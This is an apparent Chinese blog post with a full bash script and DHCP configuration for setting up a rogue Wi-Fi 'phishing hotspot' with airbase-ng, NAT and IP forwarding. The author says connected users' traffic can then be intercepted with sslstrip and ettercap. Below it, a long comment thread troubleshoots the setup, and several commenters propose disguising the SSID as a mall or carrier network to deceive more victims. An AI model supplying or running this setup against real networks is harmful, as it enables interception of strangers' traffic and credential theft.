枫少@KillBoy
6549,0083字数 0阅读0分0秒阅读模式
#! /bin/bash
case $1 in
“start”)
sleep 1
ifconfig wlan2 down
sleep 1
iwconfig wlan2 mode monitor
sleep 1
ifconfig wlan2 up
sleep 2
airmon-ng start wlan2
sleep 1
airbase-ng -e hellotest -c 11 wlan2
sleep 1
;;
“atup”)
sleep 1
ifconfig at0 up
sleep 1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
sleep 1
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
sleep 1
echo “1” >/proc/sys/net/ipv4/ip_forward
sleep 2
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
sleep 2
service isc-dhcp-server start
sleep 1
;;
“startnat”)
sleep 1
iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
sleep 1
iptables -A FORWARD -i wlan2 -o wlan0 -j ACCEPT
sleep 1
iptables -A FORWARD -p tcp –-syn -s 10.0.0.0/24 -j TCPMSS –set-mss 1356
sleep 2
;;*)
echo “Usage $0 {start|atup|startnat}”
;;
esac
将以上shell脚本保存为cr_wifi.sh,然后依次执行:
./cr_wifi.sh start ./cr_wifi atup ./cr_wifi startnat
执行完之后就可以完成钓鱼热点的创建,其他人链接热点上网的流量都会经过at0,然后利用sslstrip,ettercap就可以进行中间人攻击的一些操作了。
以上shell脚本主要有三个部分:
1,将外接无线网卡的模式修改成监听模式,创建一个SSID为hellotest的无线热点;
2,将网络流量虚拟到at0这块网卡上;启动配置好的DHCP服务器;
3,添加iptables规则,配置NAT。
执行shell脚本之前需要现配置好dhcp服务,DHCP用的是isc-dhcp-server,需要安装一下,它的配置文件(/etc/dhcp/dhcpd.conf)如下:
ddns-update-style none;
default-lease-time 600;
max-lease-time 7200;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.1 10.0.0.25;
option domain-name-servers 114.114.114.114;
# option domain-name internal.example.org;
option routers 10.0.0.1;
option broadcast-address 10.0.0.250;
default-lease-time 600;
max-lease-time 7200;
}
马来西亚 1F
at0网卡那步老失败,有人遇到吗?
印度 2F
之前试过类似操作,dhcpd总崩
澳大利亚 B1
@ HadesShadow dhcpd崩多半是端口冲突,记得先kill dhclient
马来西亚 3F
太危险了吧,随便连WiFi真有人中招
湖南省郴州市资兴市 4F
iptables规则漏了输入链吧?
湖北省咸宁市赤壁市 B1
@ 孤月客 漏输入链确实容易被反向探测到
黑龙江省 5F
感觉还行,公司内网测试用得上
山东省淄博市 6F
sslstrip现在还能这么玩?
黑龙江省哈尔滨市 7F
我去,这脚本得小心点用啊
黑龙江省哈尔滨市 B1
@ GaiaEarth 脚本跑起来一堆权限问题,新手慎碰
韩国 8F
666,黑客大会既视感
韩国 9F
想问下ettercap抓包怎么防?
中国 B1
@ 云笈 装个HTTPS Everywhere插件基本就防了大半
浙江省温州市 10F
dhcpd.conf里range写成10.0.0.1起始有点怪吧
浙江省杭州市 B1
@ 云端园丁 hellotest这名字太假了,换成“商场免费WiFi”才够迷惑😂
北京市 11F
公司内网敢这么玩怕是要被开除😂
越南 12F
之前用树莓派搭过类似环境,wlan2驱动折腾三天
北京市 B1
@ 表情包博士 树莓派那破驱动我也搞过,最后换了ALFA网卡才稳
北京市 13F
现在手机连WiFi都弹安全提示了,还管用吗?
上海市 14F
那个hellotest热点名也太明显了hhh
北京市 15F
iptables那行MASQUERADE是不是该限定源地址?
北京市 16F
这配置在VMware里能跑通不?求问
上海市 B1
@ 暗潮掌控者 VMware里无线网卡直通都费劲,更别说monitor模式了
河北省 17F
hellotest这名字也太假了,起个“中国移动_5G”才真实😂
山东省济南市 18F
at0 up那步我老卡住,后来发现是airbase-ng没跑起来
湖北省武汉市 19F
这玩意搞不好要背锅啊😱
湖北省黄冈市 B1
@ 佩兰芳 背锅警告不是吓人的,真有人拿这个搞事
江苏省常州市 20F
公司内网测试?别了吧,IT一查日志直接找上门
辽宁省大连市 21F
现在安卓连这种热点都标“无互联网连接”,谁还输密码啊
日本 22F
dhcp range从.1开始确实怪,.1不是网关吗?
浙江省 23F
脚本sleep太多,能不能加个状态检测再继续?
上海市 B1
@ 云袖轻纱 加个while检测airmon-ng状态更稳,光sleep太玄学了
日本 24F
手机连WiFi自动切流量了,钓鱼热点还有用?
广东省云浮市 25F
at0起不来十有八九是驱动问题,血泪教训
上海市 26F
这脚本在虚拟机里跑得通吗?求个避坑指南
韩国 27F
公司内网真不敢碰,IT部门查起来直接社死
河南省周口市 28F
安卓现在都标“无网络”,这招还能骗到人?
日本 29F
之前搞测试,ettercap抓不到HTTPS流量咋办
韩国 30F
dhcpd.conf这配置我改过,老报错
巴基斯坦 31F
那个range从.1开始确实离谱,网关都撞了
澳大利亚 32F
手机连都不连,现在钓鱼热点是不是过时了
辽宁省大连市 33F
这个脚本sleep确实有点多,能不能优化下?
辽宁省沈阳市皇姑区 34F
at0网卡起不来+1,折腾半天最后换了驱动才行
江苏省南京市 35F
这操作在公共场合用会不会被抓啊🤔
江苏省常州市 36F
手机连不上,是不是要关掉自动检测?
黑龙江省哈尔滨市 37F
之前试过,安卓现在确实会提示无网络
中国 38F
hellotest这名字太搞笑了,谁会上当啊😂
北京市 39F
要是热点名字伪装成CMCC,成功率会不会高点?
北京市 40F
sslstrip还能用吗?好多站都强制HSTS了
日本 41F
虚拟机里跑这个,网卡设置会不会很麻烦?
香港 42F
纯小白,完全看不懂这些命令是干啥的
江苏省泰州市 43F
那个dhcpd.conf里网关和range冲突了吧?
河南省新乡市 44F
这配置在实体机跑起来卡不卡?
韩国 45F
sslstrip现在还能用?好多网站都强制https了
中国 46F
之前用kali搞这个,驱动折腾死我了
河北省石家庄市 47F
at0网卡那步老是报错,咋整?
江苏省苏州市 48F
hellotest这名字太敷衍了吧😂
上海市 49F
虚拟机里试了下,网卡设置好麻烦
四川省内江市资中县 50F
这脚本sleep太多了,能精简不?
广东省中山市 51F
公司内网搞这个确实危险
黑龙江省大庆市 52F
纯小白表示完全看不懂
重庆市 53F
现在手机连wifi都自动检测了,还能钓到鱼?
江西省抚州市 54F
ettercap抓包效果咋样?
重庆市 55F
dhcpd.conf里range从.1开始真的没问题吗?
广东省茂名市 56F
这种操作还是小心点用